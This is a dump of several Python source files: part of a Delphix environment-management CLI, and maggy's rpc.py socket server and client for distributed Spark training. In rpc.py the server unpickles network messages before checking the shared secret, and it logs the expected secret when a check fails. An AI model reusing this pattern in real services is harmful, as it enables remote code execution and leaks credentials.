def update_host_address(dlpx_obj, old_host_address, new_host_address):
"""
Update the given host
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
old_host_obj = find_obj_by_name(dlpx_obj.server_session,
host, old_host_address)
if old_host_obj.type == "WindowsHost":
host_obj = WindowsHost()
else:
host_obj = UnixHost()
host_obj.address = new_host_address
try:
host.update(dlpx_obj.server_session, old_host_obj.reference, host_obj)
print('Attempting to update {} to {}'.format(old_host_address, new_host_address))
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Updating the host {} '
'encountered an error:\n{}'.format(old_host_address, e))
sys.exit(1)
def list_env(dlpx_obj):
"""
List all environments for a given engine
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
all_envs = environment.get_all(dlpx_obj.server_session)
for env in all_envs:
env_user = find_obj_name(dlpx_obj.server_session,
environment.user, env.primary_user)
try:
env_host = find_obj_name(dlpx_obj.server_session, host, env.host)
except AttributeError:
pass
if env.type == 'WindowsHostEnvironment':
print('Environment Name: {}, Username: {}, Host: {},'
'Enabled: {}, '.format(env.name, env_user, env_host,
env.enabled))
elif env.type == 'WindowsCluster' or env.type == 'OracleCluster':
print('Environment Name: {}, Username: {}' \
'Enabled: {}, '.format(env.name, env_user, env.enabled))
else:
print('Environment Name: {}, Username: {}, Host: {}, Enabled: {},'
' ASE Environment Params: {}'.format(
env.name, env_user, env_host, env.enabled,
env.ase_host_environment_parameters if
isinstance(env.ase_host_environment_parameters,
ASEHostEnvironmentParameters) else 'Undefined'))
def delete_env(dlpx_obj, env_name):
"""
Deletes an environment
engine: Dictionary of engines
env_name: Name of the environment to delete
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = find_obj_by_name(dlpx_obj.server_session, environment,
env_name)
if env_obj:
environment.delete(dlpx_obj.server_session, env_obj.reference)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
elif env_obj is None:
print('Environment was not found in the Engine: {}'.format(env_name))
sys.exit(1)
def refresh_env(dlpx_obj, env_name):
"""
Refresh the environment
engine: Dictionary of engines
env_name: Name of the environment to refresh
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
if env_name == "all":
env_list = find_all_objects(dlpx_obj.server_session, environment)
for env_obj in env_list:
try:
environment.refresh(dlpx_obj.server_session, env_obj.reference)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Refreshing the environment {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
else:
try:
env_obj = find_obj_by_name(dlpx_obj.server_session, environment,
env_name)
environment.refresh(dlpx_obj.server_session, env_obj.reference)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Refreshing the environment {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
def update_ase_username(dlpx_obj):
"""
Update the ASE database username
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = UnixHostEnvironment()
env_obj.ase_host_environment_parameters = ASEHostEnvironmentParameters()
env_obj.ase_host_environment_parameters.db_user = \
arguments['--update_ase_user']
try:
environment.update(dlpx_obj.server_session, find_obj_by_name(
dlpx_obj.server_session, environment, arguments['--env_name'],
env_obj).reference, env_obj)
except (HttpError, RequestError) as e:
print_exception('\nERROR: Updating the ASE DB username '
'failed:\n{}\n'.format(e))
def update_ase_pw(dlpx_obj):
"""
Update the ASE database user password
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = UnixHostEnvironment()
env_obj.ase_host_environment_parameters = ASEHostEnvironmentParameters()
env_obj.ase_host_environment_parameters.credentials = {'type':
'PasswordCredential',
'password':
arguments['--update_ase_pw']}
try:
environment.update(dlpx_obj.server_session, find_obj_by_name(
dlpx_obj.server_session, environment, arguments['--env_name'],
env_obj).reference, env_obj)
except (HttpError, RequestError) as e:
print_exception('\nERROR: Updating the ASE DB password '
'failed:\n{}\n'.format(e))
def create_linux_env(dlpx_obj, env_name, host_user, ip_addr, toolkit_path,
pw=None):
"""
Create a Linux environment.
env_name: The name of the environment
host_user: The server account used to authenticate
ip_addr: DNS name or IP address of the environment
toolkit_path: Path to the toolkit. Note: This directory must be
writable by the host_user
pw: Password of the user. Default: None (use SSH keys instead)
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_params_obj = HostEnvironmentCreateParameters()
if pw is None:
print_debug('Creating the environment with SSH Keys')
env_params_obj.primary_user = {'type': 'EnvironmentUser',
'name': host_user,
'credential': {
'type': 'SystemKeyCredential'}}
else:
print_debug('Creating the environment with a password')
env_params_obj.primary_user = {'type': 'EnvironmentUser',
'name': host_user,
'credential': {
'type': 'PasswordCredential',
'password': pw }}
env_params_obj.host_parameters = {'type': 'UnixHostCreateParameters',
'host': { 'address': ip_addr,
'type': 'UnixHost',
'name': env_name,
'toolkitPath': toolkit_path}}
env_params_obj.host_environment = UnixHostEnvironment()
env_params_obj.host_environment.name = env_name
if arguments['--ase']:
env_params_obj.host_environment.ase_host_environment_parameters = \
ASEHostEnvironmentParameters()
try:
env_params_obj.host_environment.ase_host_environment_parameters.db_user = \
arguments['--ase_user']
env_params_obj.host_environment.ase_host_environment_parameters.credentials = {
'type': 'PasswordCredential',
'password': arguments['--ase_pw']}
except KeyError:
print_exception('The --ase_user and --ase_pw arguments are'
' required with the --ase flag.\n')
try:
environment.create(dlpx_obj.server_session,
env_params_obj)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
except (DlpxException, RequestError, HttpError) as e:
print('\nERROR: Encountered an exception while creating the '
'environment:\n{}'.format(e))
except JobError as e:
print_exception('JobError while creating environment {}:\n{}'.format(
e, e.message))
def create_windows_env(dlpx_obj, env_name, host_user, ip_addr,
pw=None, connector_name=None):
"""
Create a Windows environment.
env_name: The name of the environment
host_user: The server account used to authenticate
ip_addr: DNS name or IP address of the environment
pw: Password of the user. Default: None
connector_name: Name of the Delphix connector environment to use as a
proxy for the new Windows source environment. Default: None
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_params_obj = HostEnvironmentCreateParameters()
print_debug('Creating the environment with a password')
env_params_obj.primary_user = {'type': 'EnvironmentUser',
'name': host_user,
'credential': {
'type': 'PasswordCredential',
'password': pw }}
env_params_obj.host_parameters = {'type': 'WindowsHostCreateParameters',
'host': { 'address': ip_addr,
'type': 'WindowsHost',
'name': env_name,
'connectorPort': 9100}}
env_params_obj.host_environment = WindowsHostEnvironment()
env_params_obj.host_environment.name = env_name
if connector_name:
env_obj = find_obj_by_name(dlpx_obj.server_session, environment,
connector_name)
if env_obj:
env_params_obj.host_environment.proxy = env_obj.host
elif env_obj is None:
print('Host was not found in the Engine: {}'.format(arguments['--connector_name']))
sys.exit(1)
try:
environment.create(dlpx_obj.server_session,
env_params_obj)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
except (DlpxException, RequestError, HttpError) as e:
print('\nERROR: Encountered an exception while creating the '
'environment:\n{}'.format(e))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine, dlpx_obj):
"""
This function is where we create our main workflow.
Use the @run_async decorator to run this function asynchronously.
The @run_async decorator allows us to run against multiple Delphix Engine
simultaneously
:param engine: Dictionary of engines
:type engine: dictionary
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
"""
try:
# Setup the connection to the Delphix Engine
dlpx_obj.serversess(engine['ip_address'], engine['username'],
engine['password'])
except DlpxException as e:
print_exception('ERROR: Engine {} encountered an error while '
'establishing a session:\n{}\n'.format(
engine['hostname'], e))
sys.exit(1)
thingstodo = ["thingtodo"]
try:
with dlpx_obj.job_mode(single_thread):
while len(dlpx_obj.jobs) > 0 or len(thingstodo) > 0:
if len(thingstodo)> 0:
if arguments['--type'] == 'linux' or arguments['--type'] == 'windows':
env_name = arguments['--env_name']
host_user = arguments['--host_user']
pw = arguments['--pw']
ip_addr = arguments['--ip']
host_name = arguments['--connector_name']
if arguments['--type'] == 'linux':
toolkit_path = arguments['--toolkit']
create_linux_env(dlpx_obj, env_name, host_user,
ip_addr, toolkit_path, pw)
else:
create_windows_env(dlpx_obj, env_name, host_user,
ip_addr, pw, host_name,)
elif arguments['--delete']:
delete_env(dlpx_obj, arguments['--delete'])
elif arguments['--refresh']:
refresh_env(dlpx_obj, arguments['--refresh'])
elif arguments['--update_ase_pw']:
update_ase_pw(dlpx_obj)
elif arguments['--update_ase_user']:
update_ase_username(dlpx_obj)
elif arguments['--list']:
list_env(dlpx_obj)
elif arguments['--update_host']:
update_host_address(dlpx_obj, arguments['--old_host_address'], arguments['--new_host_address'])
elif arguments['--enable']:
enable_environment(dlpx_obj, arguments['--env_name'])
elif arguments['--disable']:
disable_environment(dlpx_obj, arguments['--env_name'])
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in dlpx_obj.jobs.keys():
job_obj = job.get(dlpx_obj.server_session, dlpx_obj.jobs[j])
print_debug(job_obj)
print_info('{} Environment: {}'.format(
engine['hostname'], job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it
# from the running jobs list.
del dlpx_obj.jobs[j]
elif job_obj.job_state in 'RUNNING':
# If the job is in a running state, increment the
# running job count.
i += 1
print_info('{}: {:d} jobs running.'.format(
engine['hostname'], i))
# If we have running jobs, pause before repeating the
# checks.
if len(dlpx_obj.jobs) > 0:
sleep(float(arguments['--poll']))
except (DlpxException, RequestError, JobError, HttpError) as e:
print_exception('Error while creating the environment {}\n{}'.format(
arguments['--env_name'], e))
sys.exit(1)
def run_job(dlpx_obj, config_file_path):
"""
This function runs the main_workflow asynchronously against all the
servers specified
dlpx_obj: Virtualization Engine session object
config_file_path: filename of the configuration file for virtualization
engines
"""
#Create an empty list to store threads we create.
threads = []
engine = None
#If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
#For each server in the dxtools.conf...
for delphix_engine in dlpx_obj.dlpx_engines:
engine = dlpx_obj.dlpx_engines[delphix_engine]
#Create a new thread and add it to the list.
threads.append(main_workflow(engine, dlpx_obj))
except DlpxException as e:
print('Error encountered in run_job():\n{}'.format(e))
sys.exit(1)
elif arguments['--all'] is False:
#Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dlpx_obj.dlpx_engines[arguments['--engine']]
print_info('Executing against Delphix Engine: {}\n'.format(
arguments['--engine']))
except (DlpxException, RequestError, KeyError) as e:
print_exception('\nERROR: Delphix Engine {} cannot be '
'found in {}. Please check your value '
'and try again. Exiting.\n'.format(
arguments['--engine'], config_file_path))
else:
#Else search for a default engine in the dxtools.conf
for delphix_engine in dlpx_obj.dlpx_engines:
if dlpx_obj.dlpx_engines[delphix_engine]['default'] == \
'true':
engine = dlpx_obj.dlpx_engines[delphix_engine]
print_info('Executing against the default Delphix Engine '
'in the dxtools.conf: {}'.format(
dlpx_obj.dlpx_engines[delphix_engine]['hostname']))
break
if engine is None:
raise DlpxException("\nERROR: No default engine found. Exiting")
#run the job against the engine
threads.append(main_workflow(engine, dlpx_obj))
#For each thread in the list...
for each in threads:
#join them back together so that we wait for all threads to complete
# before moving on
each.join()
def time_elapsed(time_start):
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
:param time_start: start time of the script.
:type time_start: float
"""
return round((time() - time_start)/60, +1)
def main():
# We want to be able to call on these variables anywhere in the script.
global single_thread
global debug
time_start = time()
single_thread = False
try:
dx_session_obj = GetSession()
logging_est(arguments['--logdir'])
print_debug(arguments)
config_file_path = arguments['--config']
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job(dx_session_obj, config_file_path)
elapsed_minutes = time_elapsed(time_start)
print_info('script took {:.2f} minutes to get this far.'.format(
elapsed_minutes))
# Here we handle what we do when the unexpected happens
except SystemExit as e:
# This is what we use to handle our sys.exit(#)
sys.exit(e)
except DlpxException as e:
# We use this exception handler when an error occurs in a function call.
print_exception('ERROR: Please check the ERROR message below:\n'
'{}'.format(e.message))
sys.exit(2)
except HttpError as e:
# We use this exception handler when our connection to Delphix fails
print_exception('ERROR: Connection failed to the Delphix Engine. Please'
'check the ERROR message below:\n{}'.format(e.message))
sys.exit(2)
except JobError as e:
# We use this exception handler when a job fails in Delphix so that we
# have actionable data
print_exception('A job failed in the Delphix Engine:\n{}'.format(e.job))
elapsed_minutes = time_elapsed(time_start)
print_exception('{} took {:.2f} minutes to get this far'.format(
basename(__file__), elapsed_minutes))
sys.exit(3)
except KeyboardInterrupt:
# We use this exception handler to gracefully handle ctrl+c exits
print_debug('You sent a CTRL+C to interrupt the process')
elapsed_minutes = time_elapsed(time_start)
print_info('{} took {:.2f} minutes to get this far'.format(
basename(__file__), elapsed_minutes))
except:
# Everything else gets caught here
print_exception('{}\n{}'.format(sys.exc_info()[0],
traceback.format_exc()))
elapsed_minutes = time_elapsed(time_start)
print_info("{} took {:.2f} minutes to get this far".format(
basename(__file__), elapsed_minutes))
sys.exit(1)
if __name__ == "__main__":
#Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
#Feed our arguments to the main function, and off we go!
main()
|
rpc.py
|
#
# Copyright 2021 Logical Clocks AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
import secrets
import select
import socket
import struct
import threading
import time
import typing
from typing import Any
from pyspark import cloudpickle
from maggy.core.environment.singleton import EnvSing
from maggy.trial import Trial
if typing.TYPE_CHECKING: # Avoid circular import error.
from maggy.core.experiment_driver.driver import Driver
MAX_RETRIES = 3
BUFSIZE = 1024 * 2
SERVER_HOST_PORT = None
class Reservations(object):
"""Thread-safe store for worker reservations.
Needs to be thread-safe mainly because the server listener thread can add
reservations while the experiment driver might modify something on a
reservation.
"""
def __init__(self, required):
"""
Args:
required:
"""
self.required = required
self.lock = threading.RLock()
self.reservations = {}
self.check_done = False
def add(self, meta):
"""
Add a reservation.
Args:
:meta: a dictionary of metadata about a node
"""
with self.lock:
self.reservations[meta["partition_id"]] = {
"host_port": meta["host_port"],
"task_attempt": meta["task_attempt"],
"trial_id": meta["trial_id"],
"num_executors": self.required,
}
if self.remaining() == 0:
self.check_done = True
def done(self):
"""Returns True if the ``required`` number of reservations have been fulfilled."""
with self.lock:
return self.check_done
def get(self):
"""Get the current reservations."""
with self.lock:
return self.reservations
def remaining(self):
"""Get a count of remaining/unfulfilled reservations."""
with self.lock:
num_registered = len(self.reservations)
return self.required - num_registered
def get_assigned_trial(self, partition_id):
"""Get the ``trial_id`` of the trial assigned to ``partition_id``.
Returns None if executor with ``partition_id`` is not registered or if
``partition_id`` is not assigned a trial yet.
Args:
:partition_id: An id to identify the spark executor.
Returns:
trial_id
"""
with self.lock:
reservation = self.reservations.get(partition_id, None)
if reservation is not None:
return reservation.get("trial_id", None)
def assign_trial(self, partition_id, trial_id):
"""Assigns trial with ``trial_id`` to the reservation with ``partition_id``.
Args:
:partition_id: An id to identify the spark executor.
:trial_id: The trial id to assign, or None to clear the assignment.
"""
with self.lock:
self.reservations.get(partition_id, None)["trial_id"] = trial_id
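# --- Illustrative sketch (not part of the original module) ---
# A minimal, self-contained demonstration of how the Reservations store above
# is used: executors register with `add`, `done` flips to True once the
# required count is reached, and trials can be looked up or reassigned per
# partition. The metadata values below are made up for illustration.
def _demo_reservations():
    res = Reservations(required=2)
    for pid in (0, 1):
        res.add({
            "partition_id": pid,
            "host_port": ("127.0.0.1", 5000 + pid),  # hypothetical address
            "task_attempt": 0,
            "trial_id": None,
        })
    assert res.done() and res.remaining() == 0
    res.assign_trial(0, "trial_abc")  # hypothetical trial id
    return res.get_assigned_trial(0)  # -> "trial_abc"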
class MessageSocket(object):
"""Abstract class w/ length-prefixed socket send/receive functions."""
def receive(self, sock):
"""
Receive a message on ``sock``
Args:
sock:
Returns:
"""
msg = None
data = b""
recv_done = False
recv_len = -1
while not recv_done:
buf = sock.recv(BUFSIZE)
if buf is None or len(buf) == 0:
raise Exception("socket closed")
if recv_len == -1:
recv_len = struct.unpack(">I", buf[:4])[0]
data += buf[4:]
recv_len -= len(data)
else:
data += buf
recv_len -= len(buf)
recv_done = recv_len == 0
msg = cloudpickle.loads(data)
return msg
def send(self, sock, msg):
"""
Send ``msg`` to destination ``sock``.
Args:
sock:
msg:
Returns:
"""
data = cloudpickle.dumps(msg)
buf = struct.pack(">I", len(data)) + data
sock.sendall(buf)
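# --- Illustrative sketch (not part of the original module) ---
# The send/receive pair above implements a simple length-prefixed protocol:
# a 4-byte big-endian length header (struct.pack(">I", ...)) followed by a
# cloudpickle payload. The helper below demonstrates the framing on a byte
# string without any sockets; it reuses the module-level `struct` and
# `cloudpickle` imports.
def _demo_length_prefixed_frame():
    msg = {"type": "REG", "secret": "dummy", "data": {"partition_id": 0}}
    payload = cloudpickle.dumps(msg)
    frame = struct.pack(">I", len(payload)) + payload  # what `send` writes
    # what `receive` reconstructs: the header says how many payload bytes follow
    (length,) = struct.unpack(">I", frame[:4])
    assert length == len(frame) - 4
    return cloudpickle.loads(frame[4:])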
class Server(MessageSocket):
"""Simple socket server with length prefixed pickle messages"""
reservations = None
done = False
def __init__(self, num_executors):
"""
Args:
num_executors:
"""
if not num_executors > 0:
raise ValueError("Number of executors has to be greater than zero!")
self.reservations = Reservations(num_executors)
self.callback_list = []
self.message_callbacks = self._register_callbacks()
def await_reservations(self, sc, status={}, timeout=600):
"""
Block until all reservations are received.
Args:
sc:
status:
timeout:
Returns:
"""
timespent = 0
while not self.reservations.done():
print("Waiting for {} reservations.".format(self.reservations.remaining()))
# check status flags for any errors
if "error" in status:
sc.cancelAllJobs()
time.sleep(1)
timespent += 1
if timespent > timeout:
raise Exception("Timed out waiting for reservations to complete")
print("All reservations completed.")
return self.reservations.get()
def _handle_message(self, sock, msg, exp_driver):
"""
Handles a message dictionary. Expects a 'type' and 'data' attribute in
the message dictionary.
Args:
sock:
msg:
Returns:
"""
msg_type = msg["type"]
resp = {}
try:
self.message_callbacks[msg_type](
resp, msg, exp_driver
) # Prepare response in callback.
except KeyError:
resp["type"] = "ERR"
MessageSocket.send(self, sock, resp)
def _register_callbacks(self):
message_callbacks = {}
for key, call in self.callback_list:
message_callbacks[key] = call
return message_callbacks
def start(self, exp_driver):
"""
Start listener in a background thread.
Returns:
address of the Server as a tuple of (host, port)
"""
global SERVER_HOST_PORT
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_sock, SERVER_HOST_PORT = EnvSing.get_instance().connect_host(
server_sock, SERVER_HOST_PORT, exp_driver
)
def _listen(self, sock, driver):
CONNECTIONS = []
CONNECTIONS.append(sock)
while not self.done:
read_socks, _, _ = select.select(CONNECTIONS, [], [], 1)
for sock in read_socks:
if sock == server_sock:
client_sock, client_addr = sock.accept()
CONNECTIONS.append(client_sock)
_ = client_addr
else:
try:
msg = self.receive(sock)
# raise exception if secret does not match
# so client socket gets closed
if not secrets.compare_digest(
msg["secret"], exp_driver._secret
):
exp_driver.log(
"SERVER secret: {}".format(exp_driver._secret)
)
exp_driver.log(
"ERROR: wrong secret {}".format(msg["secret"])
)
raise Exception
self._handle_message(sock, msg, driver)
except Exception:
sock.close()
CONNECTIONS.remove(sock)
server_sock.close()
threading.Thread(
target=_listen, args=(self, server_sock, exp_driver), daemon=True
).start()
return SERVER_HOST_PORT
def stop(self):
"""
Stop the server's socket listener.
"""
self.done = True
class OptimizationServer(Server):
"""Implements the server for hyperparameter optimization and ablation."""
def __init__(self, num_executors: int):
"""Registers the callbacks for message handling.
:param num_executors: Number of Spark executors scheduled for the
experiment.
"""
super().__init__(num_executors)
self.callback_list = [
("REG", self._register_callback),
("QUERY", self._query_callback),
("METRIC", self._metric_callback),
("FINAL", self._final_callback),
("GET", self._get_callback),
("LOG", self._log_callback),
]
self.message_callbacks = self._register_callbacks()
def _register_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Register message callback.
Checks if the executor was registered before and reassigns the lost trial,
otherwise assigns a new trial to the executor.
"""
lost_trial = self.reservations.get_assigned_trial(msg["partition_id"])
if lost_trial is not None:
# the trial or executor must have failed
exp_driver.get_trial(lost_trial).status = Trial.ERROR
# add a blacklist message to the worker queue
fail_msg = {
"partition_id": msg["partition_id"],
"type": "BLACK",
"trial_id": lost_trial,
}
self.reservations.add(msg["data"])
exp_driver.add_message(fail_msg)
else:
# else add regular registration msg to queue
self.reservations.add(msg["data"])
exp_driver.add_message(msg)
resp["type"] = "OK"
def _query_callback(self, resp: dict, *_: Any) -> None:
"""Query message callback.
Checks if all executors have been registered successfully on the server.
"""
resp["type"] = "QUERY"
resp["data"] = self.reservations.done()
def _metric_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Metric message callback.
Determines if a trial should be stopped or not.
"""
exp_driver.add_message(msg)
if msg["trial_id"] is None:
resp["type"] = "OK"
elif msg["trial_id"] is not None and msg.get("data", None) is None:
resp["type"] = "OK"
else:
# lookup executor reservation to find assigned trial
# get early stopping flag, should be False for ablation
flag = exp_driver.get_trial(msg["trial_id"]).get_early_stop()
resp["type"] = "STOP" if flag else "OK"
def _final_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Final message callback.
Resets the reservation to avoid sending the trial again.
"""
self.reservations.assign_trial(msg["partition_id"], None)
resp["type"] = "OK"
# add metric msg to the exp driver queue
exp_driver.add_message(msg)
def _get_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
# lookup reservation to find assigned trial
trial_id = self.reservations.get_assigned_trial(msg["partition_id"])
# trial_id needs to be none because experiment_done can be true but
# the assigned trial might not be finalized yet
if exp_driver.experiment_done and trial_id is None:
resp["type"] = "GSTOP"
else:
resp["type"] = "TRIAL"
resp["trial_id"] = trial_id
# retrieve trial information
if trial_id is not None:
resp["data"] = exp_driver.get_trial(trial_id).params
exp_driver.get_trial(trial_id).status = Trial.RUNNING
else:
resp["data"] = None
def _log_callback(self, resp: dict, _: Any, exp_driver: Driver) -> None:
"""Log message callback.
Copies logs from the driver and returns them.
"""
# get data from experiment driver
result, log = exp_driver.get_logs()
resp["type"] = "OK"
resp["ex_logs"] = log if log else None
resp["num_trials"] = exp_driver.num_trials
resp["to_date"] = result["num_trials"]
resp["stopped"] = result["early_stopped"]
resp["metric"] = result["best_val"]
def get_assigned_trial_id(self, partition_id: int) -> dict:
"""Returns the id of the assigned trial, given a ``partition_id``.
:param partition_id: The partition id to look up.
:returns: The trial ID of the partition.
"""
return self.reservations.get_assigned_trial(partition_id)
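# Illustrative summary (derived from the callbacks above, not an authoritative
# protocol spec): an OptimizationServer answers
#   REG    -> "OK"            (registers the executor, reassigning a lost trial if any)
#   QUERY  -> "QUERY"         (data=True once all executors are registered)
#   METRIC -> "OK" or "STOP"  (STOP if the trial's early-stopping flag is set)
#   GET    -> "TRIAL"/"GSTOP" (new trial params, or global stop when the experiment is done)
#   FINAL  -> "OK"            (clears the executor's trial assignment)
#   LOG    -> "OK"            (returns driver logs and progress counters)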
class DistributedTrainingServer(Server):
"""Implements the server for distributed training."""
def __init__(self, num_executors: int):
"""Registers the callbacks for message handling.
:param num_executors: Number of Spark executors scheduled for the
experiment.
"""
super().__init__(num_executors)
self.callback_list = [
("REG", self._register_callback),
("METRIC", self._metric_callback),
("EXEC_CONFIG", self._exec_config_callback),
("LOG", self._log_callback),
("QUERY", self._query_callback),
("FINAL", self._final_callback),
]
self.message_callbacks = self._register_callbacks()
def _register_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Register message callback.
Saves workers connection metadata for initialization of distributed
backend.
"""
self.reservations.add(msg["data"])
exp_driver.add_message(msg)
resp["type"] = "OK"
def _exec_config_callback(self, resp: dict, *_: Any) -> None:
"""Executor config message callback.
Returns the connection info of all Spark executors registered.
"""
try:
resp["data"] = self.reservations.get()
except KeyError:
resp["data"] = None
resp["type"] = "OK"
def _log_callback(self, resp: dict, _: Any, exp_driver: Driver) -> None:
"""Log message callback.
Copies logs from the driver and returns them.
"""
_, log = exp_driver.get_logs()
resp["type"] = "OK"
resp["ex_logs"] = log if log else None
resp["num_trials"] = 1
resp["to_date"] = 0
resp["stopped"] = False
resp["metric"] = "N/A"
def _metric_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Metric message callback.
Confirms heartbeat messages from the clients and adds logs to the driver.
"""
exp_driver.add_message(msg)
resp["type"] = "OK"
def _query_callback(self, resp: dict, *_: Any) -> None:
"""Query message callback.
Checks if all executors have been registered successfully on the server.
"""
resp["type"] = "QUERY"
resp["data"] = self.reservations.done()
def _final_callback(self, resp: dict, msg: dict, exp_driver: Driver) -> None:
"""Final message callback.
Adds final results to the message queue.
"""
resp["type"] = "OK"
exp_driver.add_message(msg)
class Client(MessageSocket):
"""Client to register and await node reservations.
Args:
:server_addr: a tuple of (host, port) pointing to the Server.
"""
def __init__(self, server_addr, partition_id, task_attempt, hb_interval, secret):
# socket for main thread
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(server_addr)
# socket for heartbeat thread
self.hb_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.hb_sock.connect(server_addr)
self.server_addr = server_addr
self.done = False
self.client_addr = (
EnvSing.get_instance().get_ip_address(),
self.sock.getsockname()[1],
)
self.partition_id = partition_id
self.task_attempt = task_attempt
self.hb_interval = hb_interval
self._secret = secret
def _request(self, req_sock, msg_type, msg_data=None, trial_id=None, logs=None):
"""Helper function to wrap msg w/ msg_type."""
msg = {}
msg["partition_id"] = self.partition_id
msg["type"] = msg_type
msg["secret"] = self._secret
if msg_type == "FINAL" or msg_type == "METRIC":
msg["trial_id"] = trial_id
if logs == "":
msg["logs"] = None
else:
msg["logs"] = logs
msg["data"] = msg_data
done = False
tries = 0
while not done and tries < MAX_RETRIES:
try:
MessageSocket.send(self, req_sock, msg)
done = True
except socket.error as e:
tries += 1
if tries >= MAX_RETRIES:
raise
print("Socket error: {}".format(e))
req_sock.close()
req_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
req_sock.connect(self.server_addr)
return MessageSocket.receive(self, req_sock)
def close(self):
"""Close the client's sockets."""
self.sock.close()
self.hb_sock.close()
def register(self, registration):
"""
Register ``registration`` with server.
Args:
registration:
Returns:
"""
resp = self._request(self.sock, "REG", registration)
return resp
def await_reservations(self):
done = False
while not done:
done = self._request(self.sock, "QUERY").get("data", False)
time.sleep(1)
print("All executors registered: {}".format(done))
return done
def start_heartbeat(self, reporter):
def _heartbeat(self, reporter):
while not self.done:
backoff = True # Allow to tolerate HB failure on shutdown (once)
with reporter.lock:
metric, step, logs = reporter.get_data()
data = {"value": metric, "step": step}
try:
resp = self._request(
self.hb_sock, "METRIC", data, reporter.get_trial_id(), logs
)
except OSError as err: # TODO: Verify that this is necessary
if backoff:
backoff = False
time.sleep(5)
continue
raise OSError from err
self._handle_message(resp, reporter)
time.sleep(self.hb_interval)
threading.Thread(target=_heartbeat, args=(self, reporter), daemon=True).start()
reporter.log("Started metric heartbeat", False)
def get_suggestion(self, reporter):
"""Blocking call to get new parameter combination."""
while not self.done:
resp = self._request(self.sock, "GET")
trial_id, parameters = self._handle_message(resp, reporter) or (None, None)
if trial_id is not None:
break
time.sleep(1)
return trial_id, parameters
def get_exec_config(self, timeout=60):
config = None
start_time = time.time()
while not config and time.time() - start_time < timeout:
config = self._request(self.sock, "EXEC_CONFIG").get("data", None)
return config
def stop(self):
"""Stop the Clients's heartbeat thread."""
self.done = True
def _handle_message(self, msg, reporter=None):
"""
Handles a message dictionary. Expects a 'type' and 'data' attribute in
the message dictionary.
Args:
sock:
msg:
Returns:
"""
msg_type = msg["type"]
# if response is STOP command, early stop the training
if msg_type == "STOP":
reporter.early_stop()
elif msg_type == "GSTOP":
reporter.log("Stopping experiment", False)
self.done = True
elif msg_type == "TRIAL":
return msg["trial_id"], msg["data"]
elif msg_type == "ERR":
reporter.log("Stopping experiment", False)
self.done = True
def finalize_metric(self, metric, reporter):
# make sure heartbeat thread can't send between sending final metric
# and resetting the reporter
with reporter.lock:
_, _, logs = reporter.get_data()
resp = self._request(
self.sock, "FINAL", metric, reporter.get_trial_id(), logs
)
reporter.reset()
return resp
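# Illustrative usage sketch (assumption, not from the original module): a Spark
# executor typically drives a Client roughly as follows --
#   client = Client(server_addr, partition_id, task_attempt, hb_interval, secret)
#   client.register(registration_dict)
#   client.await_reservations()
#   client.start_heartbeat(reporter)
#   trial_id, params = client.get_suggestion(reporter)   # optimization mode
#   ...train...
#   client.finalize_metric(metric, reporter)
#   client.stop(); client.close()
# The reporter object and registration_dict contents are assumptions based on
# the method signatures above.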
|
event_based_scheduler_job.py
|
# Licensed to the Apache Software Foundation (ASF) under one
